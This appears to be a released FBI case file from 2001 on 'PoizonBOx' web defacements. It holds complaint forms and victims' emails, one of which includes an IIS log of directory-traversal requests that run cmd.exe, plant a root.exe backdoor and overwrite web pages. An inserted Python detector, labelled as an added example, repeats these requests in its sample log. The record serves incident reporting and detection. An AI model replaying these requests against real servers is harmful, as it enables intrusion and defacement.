Rolls Royce of Park City, 6125 Silver Creek Drive, Park City, [ ] 

Salt Lake Tribune Employee Access Website. 


Several requests for information from victims, such as 
additional logs, IP addresses, and total damages caused by the 
attacks, are still outstanding and will be reported to Chicago as 
they are received. 


Chicago is encouraged to directly contact any of the 
above victims if further questions arise. 


As this case is being handled on a national basis by 
Chicago Division, Salt Lake City will not open a case on these 
incidents. 


Salt Lake City considers this lead closed. 


FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative  See below 


Subject's name and aliases: 
Character of case: Computer Intrusion 

Complainant: [ ]  Protect Source 

Complaint received: [ ] Personal [X] Telephonic  Date 05/07/2001  Time 11:45 am 

Address of Subject: 

Complainant's address and telephone number: 
National Association of Health Data Organizations, (801) 587-9118 


Complainant's DOB 


Scars, marks and other data 


Employer Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 

[ ], an employee of the National Association of Health Data 
Organizations (NAHDO), believes hackers posted web pages of an anti-U.S. 
nature on the NAHDO web server. There was reference to the term Poizon 
BOx. The server is physically located at Research Park, University of 
Utah. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 

FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative  See below 


Subject's name and aliases: 
Character of case: Computer Intrusion 

Complainant: [ ]  Protect Source 

Complaint received: [ ] Personal [X] Telephonic  Date 05/07/2001  Time 10:00 am 

Address of Subject: 

Complainant's address and telephone number: University of Utah 
Sex: Male 
Social Security Number: 


Employer Address Telephone 


Subject's 
Description 


Scars, marks and other data 


Vehicle Description ` 


Facts of Complaint 


[ ], an employee of the Utah Education Network of the 
University of Utah, believes hackers may have used one of their servers 
as the spawn point for computer attacks against other servers. Based on 
the content of the intrusions, he believes the hackers may be Chinese. 
The server that was attacked previously had a minimal security protocol 
implemented. It is physically located at the Granite School District 
Office. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 

FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative  See below 


Subject's name and aliases Character of case 


Computer Intrusion 


Complainant: [ ]  Protect Source 


Complaint received 


[ ] Personal [X] Telephonic  Date 05/07/2001  Time 10:45 am 


Address of Subject Complainant's address and telephone number 


Complainant's DOB Sex 
Male 


Scars, marks and other data 


Employer . . Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 


[ ], an employee of Atmedica, believes hackers broke through 
the firewalls of one of their web servers. Hackers were able to post some 
of their web content. Firewall logs indicate the attacks came from 
Taiwan, Australia, and Brazil. Based on the content of the intrusions, 
and the reference to the term Poison Box, it is believed the hackers are 
pro-Chinese. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 


FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [ ] Negative [ ] See below 


Subject's name and aliases Character of case 


Subject's name and aliases: UNSUB(S) 
Character of case: COMPUTER CRIMES 

Complainant: [ ]  Protect Source 
OC Tanner 

Complaint received: [ ] Personal [X] Telephonic  Date 5/7/01  Time 4:00 pm 

Complainant's address and telephone number: 
1930 S. State Street 
SLC, UT  493-3122 
Complainant's DOB Sex 


Scars, marks and other data 


Employer Address 


Address of Subject 


Subject’s 
Description 


Telephone 


Vehicle Description i 


Facts of Complaint 


Complainant stated that it was discovered that someone had hacked into OC 
Tanner's internal websites, which have outside links to the public for retail 
sales. The unsub has altered the website and there appears to be much 
anti-government rhetoric. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 


Subject: more info 
Date: Sun, 6 May 2001 13:54:55 -0600 
From: 
To: <nipc@fbi.gov> 




This is from my Network Ice defender. 
128.84.234.79, hilbert.math.cornell.edu, 2001-05-06 16:04:33 


Thanks, Chuck 


HHcube Software Technologies, L.L.C. 


4822 South Nancy Drive 
South Ogden, UT 84403 


URL: www.hhcube.com 


---------------------------------------------------------------- 


Subject: Help ???? 


Date: Sun, 6 May 2001 13:18:47 -0600 
From: 


To: <nipc.watch@fbi.gov> b7C 


I was reviewing my IIS logs this morning and ran across a strange entry. I have never seen anything like this. It placed files all over the root system and in my internet directories. It is not good and may be a spoof, but has a very bad message. I have cleared my server of any of these files, but am still worried how they were written to my machine. I am using the security patch for IIS. 


Here is a copy of the W3SVC1 log file. 


The Root.exe is the culprit as well as the *.asp files. I don't know when 
these are scheduled to go off or anything else about them. Maybe you could 
help clue me in. 


Thanks, 
#Software: Microsoft Internet Information Services 5.0 
#Version: 1.0 
#Date: 2001-05-06 10:43:05 
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) 


---------------------------------------------------------------- 
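The W3C extended header quoted in the message above gives the field order, and the complaints in this file describe the same request pattern (directory traversal to cmd.exe, a copy of cmd.exe to root.exe, then echo redirected into index/default pages). The following Python detector is an added example, not part of the FBI record or of any complainant's material; its sample log is constructed to mirror the complaint's entries (same #Fields order, the reported client 128.84.234.79 and server 24.9.173.59), with the echo payload shortened to a placeholder.

```python
"""Flag sadmind/IIS-worm style requests in an IIS W3C extended log.

Added example for this record, not the FBI file's or the complainant's
material. SAMPLE_LOG is constructed to mirror the complaint's entries
(same #Fields order, reported client and server addresses); the echo
payload is shortened to a placeholder.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-05-06 10:43:05
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-05-06 10:43:05 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 10:43:08 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:43:10 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>defaced^</html^>>../index.asp 502 -
2001-05-06 10:43:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>defaced^</html^>>../default.htm 502 -
2001-05-06 10:45:00 192.0.2.10 - 24.9.173.59 80 GET /default.asp - 200 Mozilla/4.0
"""

# Patterns applied to the decoded request. IIS has already normalised the
# worm's overlong-Unicode traversal, so the logged stem shows plain "../".
TRAVERSAL_TO_CMD = re.compile(r"\.\.[\\/].*[\\/]cmd\.exe$", re.IGNORECASE)
BACKDOOR_STEM = re.compile(r"/root\.exe$", re.IGNORECASE)
BACKDOOR_COPY = re.compile(r"\bcopy\b.*cmd\.exe.*root\.exe", re.IGNORECASE)
# "echo ... >>target" with a web page as target: the defacement write.
DEFACEMENT = re.compile(r"\becho\b.*>>?\s*([^\s>]+\.(?:asp|html?))\s*$",
                        re.IGNORECASE)


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, entries = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("log entry before #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # wrapped or truncated line: skip rather than misalign
        entries.append(dict(zip(fields, parts)))
    return entries


def decode(value):
    """Undo W3C encoding: '+' stands for a space, then percent-decode."""
    return unquote(value.replace("+", " "))


def classify(entry):
    """Return (indicators, defacement_target) for one log entry."""
    stem = decode(entry["cs-uri-stem"])
    query = decode(entry["cs-uri-query"])
    indicators, target = [], None
    if TRAVERSAL_TO_CMD.search(stem):
        indicators.append("traversal-to-cmd.exe")
    if BACKDOOR_STEM.search(stem):
        indicators.append("root.exe-backdoor")
    if BACKDOOR_COPY.search(query):
        indicators.append("backdoor-install")
    m = DEFACEMENT.search(query)
    if m:
        indicators.append("defacement-write")
        target = m.group(1)
    return indicators, target


def analyze(text):
    """Group matching requests by client IP.

    sc-status is tallied but never used to judge success: the complainant
    found root.exe and the rewritten pages on disk although IIS logged 502
    for those requests, so a 502 here is not evidence the command failed.
    """
    report = {}
    for e in parse_w3c(text):
        indicators, target = classify(e)
        if not indicators:
            continue
        r = report.setdefault(e["c-ip"], {"requests": 0, "indicators": set(),
                                         "defaced": [], "statuses": {}})
        r["requests"] += 1
        r["indicators"].update(indicators)
        r["statuses"][e["sc-status"]] = r["statuses"].get(e["sc-status"], 0) + 1
        if target:
            r["defaced"].append(target)
    for r in report.values():
        r["indicators"] = sorted(r["indicators"])
    return report


if __name__ == "__main__":
    for ip, r in analyze(SAMPLE_LOG).items():
        print(ip, r["requests"], "requests", r["indicators"],
              "wrote:", r["defaced"], "statuses:", r["statuses"])
```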


Subject: issue with intrusion! 


Date: Sun, 6 May 2001 13:50:37 -0600 
From: 
To: <nipc@fbi.gov> 


Date May 6 2001 

Last Name 

First Name 

Mi[ ] 

Street/Mailing Address 

4822 South Nancy Drive 

City South Ogden 

State Utah 

Zip Code/Postal Code 84403 


Country U.S.A. 


Intrusion Information 

Organization HHcube Software Technologies 
Contact Name 

Street Address 


4822 South Nancy Drive 


b6 
b7C 


b6 
b7C 


City South Ogden 

State UT 

Zip/Postal Code 84403 

Domain  hhcube.com 

IP Address 24.9.173.59 

Type of System : Commercial 

Date intrusion first detected Today 

# of users affected 10 

Hours system down 6 

Estimated dollar loss: equipment, work hours, software, accounts affected $10,000.00 

Is the intrusion/attack ongoing ? No 

Is the sysadmin logging information ? Yes 

Suspected origination domain/IP address: 128.84.234.79 

Was/is classified/national security information maintained on the affected system? No 

Insider/Hacker/Foreign etc... Cornell University 

Was this intrusion reported to the local FBI Office ? No 

To the standard nipc@fbi.gov. 

Code from administrator's log: 

2001-05-06 10:43:05 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 10:43:07 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 10:43:08 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:43:10 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../index.asp 502 -
2001-05-06 10:43:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../index.htm 502 -
2001-05-06 10:43:15 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../default.asp 502 -
2001-05-06 10:43:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../default.htm 502 -
2001-05-06 10:43:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:43:19 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../../index.asp 502 -
2001-05-06 10:43:19 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../../index.htm 502 -
2001-05-06 10:43:20 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../../default.asp 502 -
2001-05-06 10:43:21 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../../default.htm 502 -
2001-05-06 10:43:23 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:43:25 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../AdminScripts/index.asp 502 -
2001-05-06 10:43:27 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../AdminScripts/index.htm 502 -
2001-05-06 10:43:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../AdminScripts/default.asp 502 -
2001-05-06 10:43:31 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../AdminScripts/default.htm 502 -
2001-05-06 10:43:31 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:43:34 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../ftproot/index.asp 502 -
2001-05-06 10:43:36 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../ftproot/index.htm 502 -
2001-05-06 10:43:39 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../ftproot/default.asp 502 -
2001-05-06 10:43:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../ftproot/default.htm 502 -
2001-05-06 10:43:43 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:43:45 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../iissamples/index.asp 502 -
2001-05-06 10:43:48 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../iissamples/index.htm 502 -
2001-05-06 10:43:53 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../iissamples/default.asp 502 -
2001-05-06 10:43:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../iissamples/default.htm 502 -
2001-05-06 10:43:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:43:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../mailroot/index.asp 502 -
2001-05-06 10:43:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../mailroot/index.htm 502 -
2001-05-06 10:43:58 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../mailroot/default.asp 502 -
2001-05-06 10:44:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../mailroot/default.htm 502 -
2001-05-06 10:44:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:02 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../nntpfile/index.asp 502 -
2001-05-06 10:44:04 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../nntpfile/index.htm 502 -
2001-05-06 10:44:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../nntpfile/default.asp 502 -
2001-05-06 10:44:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../nntpfile/default.htm 502 -
2001-05-06 10:44:08 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 10:44:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../Scripts/index.asp 502 -
2001-05-06 10:44:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../Scripts/index.htm 502 -
